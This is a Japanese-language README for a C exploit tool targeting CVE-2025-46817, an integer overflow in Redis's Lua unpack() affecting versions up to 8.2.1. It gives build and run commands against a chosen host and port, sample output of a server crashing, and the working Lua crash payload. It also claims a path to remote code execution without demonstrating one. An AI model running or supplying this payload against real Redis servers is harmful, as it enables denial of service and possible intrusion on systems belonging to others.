
CVE-2025-46817 用の C ベースのエクスプロイト。Redis の整数オーバーフロー脆弱性を利用し、クラッシュ検出と Lua の unpack() ペイロードによる潜在的な RCE を可能にします。
Redis 整数オーバーフロー脆弱性に対する CVE-2025-46817 エクスプロイトの軽量 C 実装です。
sudo apt-get update
sudo apt-get install build-essential libhiredis-dev
sudo yum install gcc hiredis-devel
brew install hiredis
gcc -o exploit exploit.c -lhiredis
./exploit -H 127.0.0.1 -P 6379
./exploit -H 192.168.1.100 -P 6379 -t 5
-H <host> Redis サーバーホスト(必須)
-P <port> Redis サーバーポート(必須)
-t <timeout> 接続タイムアウト(秒)(デフォルト: 10)
-h ヘルプメッセージを表示
██▓███ █ █░███▄ █ ▄▄▄▄ █ ██ █████▒ █████▒▓█████ ██▀███
▓██░ ██▒▓█░ █ ░█░██ ▀█ █ ▓█████▄ ██ ▓██▒▓██ ▒▓██ ▒ ▓█ ▀ ▓██ ▒ ██▒
▓██░ ██▓▒▒█░ █ ░█▓██ ▀█ ██▒▒██▒ ▄██▓██ ▒██░▒████ ░▒████ ░ ▒███ ▓██ ░▄█ ▒
▒██▄█▓▒ ▒░█░ █ ░█▓██▒ ▐▌██▒▒██░█▀ ▓▓█ ░██░░▓█▒ ░░▓█▒ ░ ▒▓█ ▄ ▒██▀▀█▄
▒██▒ ░ ░░░██▒██▓▒██░ ▓██░░▓█ ▀█▓▒▒█████▓ ░▒█░ ░▒█░ ░▒████▒░██▓ ▒██▒
▒▓▒░ ░ ░░ ▓░▒ ▒ ░ ▒░ ▒ ▒ ░▒▓███▀▒░▒▓▒ ▒ ▒ ▒ ░ ▒ ░ ░░ ▒░ ░░ ▒▓ ░▒▓░
░▒ ░ ▒ ░ ░ ░ ░░ ░ ▒░▒░▒ ░ ░░▒░ ░ ░ ░ ░ ░ ░ ░ ░▒ ░ ▒░
░░ ░ ░ ░ ░ ░ ░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░░ ░
░ ░ ░ ░ ░ ░ ░
░
CVE-2025-46817 Exploit Tool
Integer Overflow -> RCE Chain
Access -> https://pwnbuffer.org/
Author: Slayerkkk
Target: Redis <= 8.2.1
Type: Memory Corruption -> Code Execution
ℹ️ 127.0.0.1:6379 への接続をテスト中...
✅ 接続成功
ℹ️ Redis バージョン: 8.2.1
❌ 脆弱 - バージョン <= 8.2.1
ℹ️ Lua スクリプティングをテスト中...
✅ Lua 有効(1+1=2)
🚀 エクスプロイト開始
==================================================
💀 エクスプロイトペイロードを実行中...
Payload: unpack() による整数オーバーフロー
💥 サーバーがクラッシュ - 接続が切断されました!
📊 エクスプロイト結果
==============================
💥 ステータス: crashed (2.34s)
💀 エクスプロイト成功 - サーバーがクラッシュしました!
CVE-2025-46817 脆弱性が確認されました
このエクスプロイトは、Redis の Lua unpack() 関数の実装(luaB_unpack)における整数オーバーフローを標的としています。特定のパラメータで呼び出されると、符号付き整数演算がオーバーフローし、Redis が膨大な数の戻り値の実体化を試みます。
local data = {1, 2, 3}
return {unpack(data, -2147483648, 2147483647)}
このツールは以下のステータスのいずれかを報告します:
作者: Slayerkkk
ウェブサイト: https://pwnbuffer.org